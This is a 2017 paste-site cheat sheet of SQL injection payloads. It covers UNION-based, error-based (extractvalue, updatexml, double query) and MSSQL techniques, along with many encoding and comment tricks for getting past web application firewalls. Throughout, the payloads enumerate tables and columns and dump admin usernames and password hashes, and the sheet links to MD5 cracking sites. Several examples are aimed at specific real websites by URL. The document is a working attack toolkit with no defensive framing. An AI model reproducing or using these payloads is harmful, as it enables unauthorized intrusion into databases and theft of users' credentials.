
SQL Injection #ALL By Pro Huss_x

a guest
Jul 30th, 2017
  1.  
  2. #SQL injection
  3. By Pro Huss_x ++
  4. ################################################################
  5.  
  6. ("/'/*/-)
  7. ----------------------------------------------------------------
  8. +having+1=1
  9.  
  10. ################################################################
  11.  
  12. +/*order*/+/*by*/+1-- -
  13. ----------------------------------------------------------------
  14. +order+by+100
  15. ----------------------------------------------------------------
  16. +Order+by+100+--+
  17. ----------------------------------------------------------------
  18. +Order+by+100-- -
  19. ----------------------------------------------------------------
  20. +Order+by+100-- _
  21. ----------------------------------------------------------------
  22. +Order+by+100--#
  23. ----------------------------------------------------------------
  24. +group+by+100-- -
  25. ----------------------------------------------------------------
  26. +order+by+100/*
  27. ----------------------------------------------------------------
  28. +order+by+100--
  29.  
  30. ################################################################
  31.  
  32. ( - ) [.php?id=-3 ]
  33. ----------------------------------------------------------------
  34. +union+select+
  35. ----------------------------------------------------------------
  36. +/**/uNIOn/**/+/**/sEleCt/**/+
  37. ----------------------------------------------------------------
  38. /*!50000UNION*/+/*!50000ALL*/+/*!50000SELECT*/
  39. ----------------------------------------------------------------
  40. +/*!12345union*/+/*!12345select*/+
  41. ----------------------------------------------------------------
  42. +union+distinct+select+
  43. ----------------------------------------------------------------
  44. +union+distinctROW+select+
  45. ----------------------------------------------------------------
  46. +%2F**/+Union/*!select*/
  47. ----------------------------------------------------------------
  48. /**//*!12345UNION SELECT*//**/
  49. ----------------------------------------------------------------
  50. /**//*!50000UNION SELECT*//**/
  51. ----------------------------------------------------------------
  52. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  53. ----------------------------------------------------------------
  54. +/*!u%6eion*/+/*!se%6cect*/+
  55. ----------------------------------------------------------------
  56. /**/uniUNIONon/**/selSELECTect/**/
  57. ----------------------------------------------------------------
  58. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  59. ----------------------------------------------------------------
  60. union /*!50000%53elect*/
  61. ----------------------------------------------------------------
  62. %55nion %53elect
  63. ----------------------------------------------------------------
  64. %75%6E%69%6F%6E+%73%65%6C%65%63%74
  65. ----------------------------------------------------------------
  66. %55nion(%53elect 1,2,3)-- -
  67. ----------------------------------------------------------------
  68. %a0union%a0select%09
  69. ----------------------------------------------------------------
  70. union/*&sort=*/select
  71. ----------------------------------------------------------------
  72. %0A%09UNION%0CSELECT%A0
  73. ----------------------------------------------------------------
  74. +%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+
  75. ----------------------------------------------------------------
  76. +UnIOn%0d%0aSeleCt%0d%0a1,2,3
  77. ----------------------------------------------------------------
  78. +union%23foo*%2F*bar%0D%0Aselect% 23foo%0D%0A1%2C2%2C1,2,3
  79. ----------------------------------------------------------------
  80. /*!fuckU%0d%0aunion*/+/*!fuckU%0d% 0aSelEct*/
  81. ----------------------------------------------------------------
  82. /**//*!union*//**//*!select*//**/
  83. ----------------------------------------------------------------
  84. union++++all++++select/
  85. ----------------------------------------------------------------
  86. php?id=1 /**/UniON/**//*50000seLect*/ 1,2,3,4,5--
  87. ----------------------------------------------------------------
  88. /*!union*//*--*//*!all*//*--*//*!select*/ 1,2,3,4,5,6
  89. ----------------------------------------------------------------
  90. /*!union*//*--*//*!all*//*--*//*!select*/ 1,2,3,4,5,6
  91. ----------------------------------------------------------------
  92. +Having+1=2+union+All+select+
  93. ----------------------------------------------------------------
  94. +union+distinct+select+
  95. ----------------------------------------------------------------
  96. +union+distinctROW+select
  97. ----------------------------------------------------------------
  98. index.php?id=(1)+union+(select+(0),(0),(0),@@versi on,(0))--+
  99.  
  100. ################################################################
  101.  
  102. version() | in linux
  103. ----------------------------------------------------------------  
  104. @@version  | in Windows
  105. ----------------------------------------------------------------
  106. database()
  107. ----------------------------------------------------------------
  108. user()
  109. ----------------------------------------------------------------
  110. @@datadir
  111. ----------------------------------------------------------------
  112. system_user()
  113. ----------------------------------------------------------------
  114. concat(user(),0x3a,version(),0x3a,database())
  115.  
  116. ################################################################
  117.  
  118. group_concat(table_name)
  119. ----------------------------------------------------------------
  120. gROuP_CoNcaT(TAblE_nAMe)
  121. ----------------------------------------------------------------
  122. +from information_schema.tables+where+table_schema=database()--
  123.  
  124. ################################################################
  125.  
  126. group_concat(column_name)
  127. ----------------------------------------------------------------
  128. +from information_schema.columns where table_name=0x
  129. ----------------------------------------------------------------
  130. http://www.waraxe.us/sql-char-encoder.html
  131. ----------------------------------------------------------------
  132. [id,pass,user,email]
  133.  
  134. ################################################################
  135.  
  136. group_concat(user,0x3a,pass)
  137. ----------------------------------------------------------------
  138. +from+users
  139.  
  140. ################################################################
  141.  
  142. Hash Md5
  143.  
  144. https://hashkiller.co.uk/md5-decrypter.aspx
  145. ----------------------------------------------------------------
  146. http://www.hashchecker.de/find.html
  147.  
  148. ################################################################
  149.  
  150. #password
  151.  
  152. concat(table_name,0x3e,column_name,0x3e,table_schema)
  153. ----------------------------------------------------------------
  154. +from+information_schema.columns+where+column_name+like+char(37, 112, 97, 115, 115, 37)--
  155.  
  156. #username
  157.  
  158. group_concat(table_Name,0x3a,column_Name)
  159. ----------------------------------------------------------------
  160. from+information_schema.columns+where+table+name=0x
  161.  
  162. ################################################################
  163.  
  164. +order+by+number  
  165. ----------------------------------------------------------------
  166. +union+select+1,2,3,4,5,6....
  167. ----------------------------------------------------------------
  168. concat(column_name,0x3e,table_schema,0x3e,table_name)
  169. ----------------------------------------------------------------
  170. +from+information_schema.columns+where+column_name+like+char(37, 112, 97, 115, 115, 37)--
  171.  
  172. ################################################################
  173.  
  174. #Not Acceptable!+forbidden
  175.  
  176. +/*!50000UNiON+/*!50000SeLeCt*/+
  177. ----------------------------------------------------------------
  178. +/*!50000Union*/+SeLEct+
  179. ----------------------------------------------------------------
  180. +Union+/*!50000SeLEct*/+
  181. -----------------------------------------------------------------
  182. /*!50000GrOuP_CoNcAT(table_name)*/
  183. -----------------------------------------------------------------
  184. group_concat(/*!50000table_name*/)
  185. -----------------------------------------------------------------
  186. +from+/*!50000information_schema*/./*!50000tables*/+where+/*!50000table_schema*/=database()-- -
  187. -----------------------------------------------------------------
  188. /*!50000GrOuP_CoNcAT(column_name)*/
  189. -----------------------------------------------------------------
  190. GrOuP_CoNcAT(/*!50000column_name*/)
  191. -----------------------------------------------------------------
  192. +from+/*!50000information_schema*/./*!50000columns*/+where+/*!50000table_schema*/=database()-- -
  193. ----------------------------------------------------------------
  194. +from+/*!50000information_schema*/./*!50000columns*/+where+/*!50000table_name*/=-- -
  195. ----------------------------------------------------------------
  196. /*!50000GrOuP_CoNcAT(password,0x3a,username)*/
  197. ----------------------------------------------------------------
  198. +from+admin-- -
  199. ----------------------------------------------------------------
  200. export_set(5,@:=0,(select+count()/!50000from*/+/!50000information_schema/.columns where table_schema=database() and @:=export_set(5,export_set%285,@,0x3c6c693e,/!50000column_name/,2),0x3a3a,/!50000table_name/,2)),@,2)
  201.  
  202. ################################################################
  203.  
  204. #unhex(hex(بيانات الاستعلام)))
  205.  
  206. ----------------------------------------------------------------
  207. unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3 e,table_Name)))
  208. ----------------------------------------------------------------
  209. /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
  210. ----------------------------------------------------------------
  211. grOUp_ConCat(/*!TaBlE_NamE*/)
  212. ----------------------------------------------------------------
  213. +FrOm+InfoRmaTion_ScHEma./*!TaBleS*/
  214. ----------------------------------------------------------------
  215. grOUp_ConCat(/*!TaBlE_NamE*/,0x3e,/*!CoLuMn_NamE*/)
  216. ----------------------------------------------------------------
  217. +FrOm+InfoRmaTion_ScHEma./*!CoLuMnS*/+WheRe+/*!TaBlE_NamE*/+like+CHAR(97, 100, 109, 105, 110)
  218. ----------------------------------------------------------------
  219. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  220. ----------------------------------------------------------------
  221. +FrOm+
  222. ---------------#####-------------------------------------------
  223.  
  224. +from+information_schema . tables
  225. ----------------------------------------------------------------
  226. /*!12345UNION*/ /*!12345SELECT*/ /*!ALL*/
  227. ----------------------------------------------------------------
  228. /*!GrOuP_CoNcAT(table_name)*/
  229. ----------------------------------------------------------------
  230. +FROM /*!INFORMATION_SCHEMA*/./*!TABLES*/ WHERE TABLE_SCHEMA=DATABASE()-- -
  231.  
  232. ################################################################
  233.  
  234. /*!50000 */
  235. /*!40000 */
  236. /*!30000 */
  237.  
  238. /*!12345 */
  239. /*!41320 */
  240. /*!32302 */
  241. /*!00000 */
  242.  
  243. /*! */
  244. /**/
  245. +/**/+
  246.  
  247. /*! GROUP_CONCAT(,0x3a,)*/
  248. /*!concat_ws(0x3a,)*/
  249.  
  250. +union+distinct+select+
  251. +union+distinctROW+select+
  252.  
  253. ################################################################
  254.  
  255. #Not Acceptable!+forbidden 2
  256.  
  257. ----------------------------------------------------------------
  258. +/*!00000UNION*/+SELECT+
  259. ----------------------------------------------------------------
  260. /*!00000group_concat(table_name)*/
  261. ----------------------------------------------------------------
  262. +/*!00000from+information_schema.tables*/+where+table_schema=database()-- -
  263. ----------------------------------------------------------------
  264. /*!00000group_concat(column_name)*/
  265. ----------------------------------------------------------------
  266. +/*!00000from+information_schema.columns*/+where+table_name=-- -
  267. ----------------------------------------------------------------
  268. +/*!00000group_concat(table_Name,0x3a,column_Name)*/
  269. ----------------------------------------------------------------
  270. +from+admin-- -
  271.  
  272. ################################################################
  273.  
  274.  
  275. =1 and 1=1
  276. ----------------------------------------------------------------
  277. =1 and 1=2
  278.  
  279. +AND MID(VERSION(),1,1) = '3';
  280. ----------------------------------------------------------------
  281. +AND MID(VERSION(),1,1) = '4';
  282. ----------------------------------------------------------------
  283. +AND MID(VERSION(),1,1) = '5';
  284. ----------------------------------------------------------------
  285. =-[.]1 union select 1,2,3,4,5,6,7,8,9,10,version() -- -
  286. ----------------------------------------------------------------
  287. version = 5.1.73-0ubuntu0.10.04.1
  288.  
  289. ################################################################
  290.  
  291. #Forbidden Hing
  292.  
  293. ----------------------------------------------------------------
  294. current_user/**_**/()
  295. ----------------------------------------------------------------
  296. database/**_**/()
  297. ----------------------------------------------------------------
  298. div @s:=(concat(@c:=0x00,if((select count(*)/*!50000from*//*!50000information_schema*/.columns where table_schema=database/**X**/() and @c:=concat(@c, 0x3c62723e, /*!50000table_name*/,0x2e,/*!50000column_name*/)),0x00,0x00),@c))/*!50000union*/ select
  299. ----------------------------------------------------------------
  300. concat(0x3c62723e, version(), 0x203a3a20416c69204b68616e,0x3c62723e64617461626173653a20,DataBasE/**X**/(),0x3c62723e757365723a20,UsEr/**X**/(), @s)
  301. ----------------------------------------------------------------
  302. div @s:=((SELECT+GROUP_CONCAT(password,0x3a,username+SEPARATOR+0x3c62723e)+FROM+user)) /*!50000union*/ select
  303. ----------------------------------------------------------------
  304. (@s)
  305. ----------------------------------------------------------------
  306. %66rom
  307. ----------------------------------------------------------------
  308. export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns where table_schema=database() and @:=export_set(5,export_set%285,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2)
  309. ################################################################
  310.  
  311. #Boolean
  312.  
  313. +in+boolean+mode)+UNION+SELECT+
  314.  
  315. ################################################################
  316.  
  317. #Error Based
  318.  
  319. ----------------------------------------------------------------
  320. or 1 group by concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2)) having min(0) or 1
  321. ----------------------------------------------------------------
  322. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  323. ----------------------------------------------------------------
  324. and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  325. ----------------------------------------------------------------
  326. and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x726174696e6773 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  327. ----------------------------------------------------------------
  328. and (select 1 from (select count(*),concat((select(select concat(cast(concat(mm_pwd,0x7e,mm_role) as char),0x7e)) from lpsschoo.members limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  329. ----------------------------------------------------------------#Data
  330. and+extractvalue(rand(),concat(0x7e,(select+concat(mm_pwd,0x7e,mm_role)+from+members+limit+0,1)))
  331. ----------------------------------------------------------------
  332. +or+1+group+by+concat_ws(0x7e,(select+concat(uname,0x7e,pass)+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1-- -
  333. ################################################################
  334.  
  335. #Fatal Error Occurred
  336.  
  337. null or version()
  338.  
  339.  
  340. http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,5,6--
  341.  
  342. http://wwfa.org.uk/article.php?id=-174 UNION SELECT null,2,3,4,5,6-- -
  343.  
  344. http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,null,3,4,5,6-- -
  345.  
  346. http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,null,4,5,6-- -
  347.  
  348. http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,null,5,6-- -
  349.  
  350. http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,null,6-- -
  351.  
  352. http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,5,null-- -
  353.  
  354. or all null or version()
  355.  
  356. http://wwfa.org.uk/article.php?id=-174 UNION SELECT version(),version(),version(),version(),version(),version()--
  357.  
  358. http://wwfa.org.uk/article.php?id=-174 UNION SELECT null,null,null,null,null,null-- -
  359.  
  360. or
  361.  
  362. http://wwfa.org.uk/article.php?id=.174+and+1=2
  363.  
  364. http://wwfa.org.uk/article.php?id=.174+and+1=2+union+select "1' UNION SELECT+1,2,3-- -",2,3-- -
  365.  
  366.  
  367.  
  368. ################################################################
  369.  
  370. #Illegal mix of collations
  371.  
  372. ----------------------------------------------------------------
  373. Illegal mix of collations for operation 'UNION'
  374. ----------------------------------------------------------------
  375. http://smtmax.com/category.php?id=15
  376. ----------------------------------------------------------------
  377. smtmax.com/category.php?id=.15 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- -
  378. ----------------------------------------------------------------
  379. group_concat(table_name)
  380. ----------------------------------------------------------------
  381. +From+InfORmaTion_schema.+tAblES+Where+table_ScHEmA=schEMA()-- -
  382. ------------------########-------------------------------------
  383.  
  384. convert(group_concat(table_name) using ascii)
  385. ----------------------------------------------------------------
  386. unhex(hex(group_concat(table_name)))
  387. ----------------------------------------------------------------
  388. convert(value using xxxx)
  389. ----------------------------------------------------------------
  390. unhex(hex(value))
  391. ----------------------------------------------------------------
  392. cast(value as char)
  393. ----------------------------------------------------------------
  394. uncompress(compress(version()))
  395. ----------------------------------------------------------------
  396. cast(value as char)
  397. ----------------------------------------------------------------
  398. aes_decrypt(aes_encrypt(value,1),1)
  399. ----------------------------------------------------------------
  400. binary(value)
  401. ----------------------------------------------------------------
  402. ascii
  403. ujis
  404. ucs2
  405. tis620
  406. swe7
  407. sjis
  408. macroman
  409. macce
  410. latin7
  411. latin5
  412. latin2
  413. koi8u
  414. koi8r
  415. keybcs2
  416. hp8
  417. geostd8
  418. gbk
  419. gb2132
  420. armscii8
  421. ascii
  422. cp1250
  423. big5
  424. cp1251
  425. cp1256
  426. cp1257
  427. cp850
  428. cp852
  429. cp866
  430. cp932
  431. dec8
  432. euckr
  433. latin1
  434. utf8
  435.  
  436. ################################################################
  437.  
  438. #nember table :
  439.  
  440. id=vv()
  441. id=@10
  442. id==10
  443. =10=10
  444. id=.10
  445. id=-10
  446. &id=polygon(10)
  447. id=null
  448. id=9999
  449. id=999999.9
  450. id=(-10)
  451. id=10+and+false+
  452. id=10 and 0
  453. id=10 dev 0
  454. ----------------------------------------------------------------
  455. +And+1=2
  456. and (1)!=(0)
  457. +and(1)=(0)
  458. +and+2>3+
  459. /*!aND*/ 1 like 0
  460. +where+1=2
  461. /*!and*/+1=0
  462. /*!and*/+1=0
  463. ---------------------------------------------------------------------------------------------------------------
  464. 2-search for vulnerable column (like 11111) in source code.
  465.  
  466. +/*!12345union*/+select+1111,2222,3333,4444--+
  467. ---------------------------------------------------------------------------------------------------------------
  468. 3-put null to all columns and then starting with column ,replace single null to some number (one in a time).
  469.  
  470. +/*!12345union*/+select+null,null,null,null--+
  471. ---------------------------------------------------------------------------------------------------------------
  472. 4-add version() in all columns.
  473.  
  474. +/*!12345union*/+select+version(),version(),version(),version()--+
  475. ---------------------------------------------------------------------------------------------------------------
  476. 5-Brute Forcing COlumns In SQLi By Check Every Column.
  477.  
  478. +/*!12345union*/+select+1111--+
  479. +/*!12345union*/+select+1111,2222--+
  480. +/*!12345union*/+select+1111,2222,3333--+
  481. +/*!12345union*/+select+1111,2222,3333,4444--+
  482. ---------------------------------------------------------------------------------------------------------------
  483. 6-check for routed query.
  484.  
  485. ' and 0 Union SeLEct 1,"2' and 0 Union SeLEct 1,2,3,version(),5,6,7,8,9-- -",3,4,5,6,7,8,9-- -
  486. ---------------------------------------------------------------------------------------------------------------
  487. 7-check for injection inside injection.
  488.  
  489. '*2e9unioN Select!1,2,3,4,5,0x6c656c276f72646572206279203123%23
  490. ---------------------------------------------------------------------------------------------------------------
  491. 8-check commenting out remaining query at the end for your injection.
  492.  
  493. | --+ | --+- | +--+ | -- - | ` | ;-- - | " | %23 | %60 | ;%00 |%2523 | %2560 | ;%2500 | 0%0a) | // | /**/ | /* | # | / | ) | )' |
  494.  
  495. ################################################################
  496.  
  497. #Xpath UpdateXML 1
  498.  
  499.  
  500. ## version ##
  501.  
  502. +and+extractvalue(rand(),concat(0x7e,version()))-- -
  503.  
  504. ## Tables :
  505.  
  506. +and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))-- -
  507.  
  508. ## column :
  509.  
  510. +and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=TABLE_HEX+limit+0,1)))-- -
  511.  
  512. http://www.waraxe.us/sql-char-encoder.html  
  513.  
  514. ## Data :
  515.  
  516. +and+extractvalue(rand(),concat(0x7e,(select+concat(column1,0x7e,column2)+from+table+limit+0,1)))-- -
  517.  
  518. ################################################################
  519.  
  520. #Xpath UpdateXML 2
  521.  
  522.  
  523. ## Version ##
  524.  
  525. +and+updatexml(0x7e,concat(0x7e,(version())),0)--
  526. +and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/ version()),0x7e),1)
  527.  
  528. ## Getting The Tables (UpdateXML)
  529.  
  530. +and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+from+information_sch​ema.tables+where+table_schema=database()+limit+0,1))),0)--
  531.  
  532. ##  Getting Columns (UpdateXML)
  533.  
  534. +and+updatexml(0x7e,concat(0x7e,((select+concat(column_name)+from+information_sc​hema.columns+where+table_name=0xTABLE_HEX+limit+0,1))),0)--
  535.  
  536. ##  Getting Data (UpdateXML)
  537.  
  538. +and+updatexml(0x7e,concat(0x7e,((select+concat(column1,0x7e,column2)+from+TABLENAME+limit+0,1))),0)--
  539.  
  540. ################################################################
  541.  
  542. #move injection
  543.  
  544. concat('</title><script>alert("',SQLI,'")</script>')
  545.  
  546. ################################################################
  547.  
  548. #xtype=char85
  549.  
  550.  
  551. # DB #
  552.  
  553. +or 1=convert(int,(DB_NAME()))--
  554.  
  555. # table_name #
  556.  
  557. +or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85)))--
  558.  
  559. and name!='TABLE-NAME-1'
  560.  
  561. # column_name #
  562.  
  563. +or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'))--
  564.  
  565. and column_name!='COLUMN-NAME-1'
  566.  
  567. # data #
  568.  
  569. +or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1))--
  570.  
  571. +or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-1-VALUE') order by COLUMN-NAME-1 desc))--
  572.  
  573. ################################################################
  574.  
  575. #DOUBLE Query Injection's
  576.  
  577. #version
  578.  
  579. +and(select 1 from(select count(*),concat((select (select concat(version())) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  580.  
  581. ## Getting The DataBase  ##
  582.  
  583. +and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  584.  
  585. ## Getting The Tables  ##
  586.  
  587. +and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(table_name),0x27,0x7e) from information_schema.tables where table_schema=hex-database limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  588.  
  589. ## Getting The Columns  ##
  590.  
  591. +and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns+Where+table_schema=hex-database AND table_name=hex-table LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  592.  
  593. ## Dump Data  ##
  594.  
  595. +and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e,cast(table_name.column_name as char)) FROM `database_name`.table_name LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  596.  
  597. ################################################################
  598.  
  599. #The connection was reset
  600.  
  601. http://www.avt.sd/mpage.php?id=2-.1union select 1,2,3,4,5,6,7,8,9,10
  602.  
  603. ?id=2-
  604.  
  605. ?id=2-.1
  606.  
  607. ?id=2-.1union select
  608.  
  609. ################################################################
  610.  
  611. #union based in Windows
  612.  
  613. # EXTRACT DATABASE USER #
  614.  
  615. USER - DB_NAME - @@VERSION - @@SERVERNAME - db_name()
  616. ---------------------------------------------------------------------------------------------------------------
  617. http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,db_name(),3--
  618. ---------------------------------------------------------------------------------------------------------------
  619. #db_table
  620.  
  621. schema_name
  622.  
  623. +from information Schema.schemata-- -
  624.  
  625. id=-174 UNION SELECT 1,schema_name,3+from information Schema.schemata-- -
  626. ---------------------------------------------------------------------------------------------------------------
  627. # table_name #
  628.  
  629. table_name
  630.  
  631. from information Schema.table_shema!=db_name-- -
  632.  
  633. id=-174 UNION SELECT 1,table_name,3+from information Schema.table_shema!=db_name-- -
  634. ---------------------------------------------------------------------------------------------------------------
  635. # column_name #
  636.  
  637. column_name
  638.  
  639. +from DBNAME.information_schema.columns where table_name='o_admin'--
  640.  
  641. id=-174 UNION SELECT 1,column_name,3+from DBNAME.information_schema.columns where table_name='o_admin'--
  642. ---------------------------------------------------------------------------------------------------------------
  643. #Data
  644.  
  645. id=-174 UNION SELECT 1,password,3+from+o_admin--
  646.  
  647. ################################################################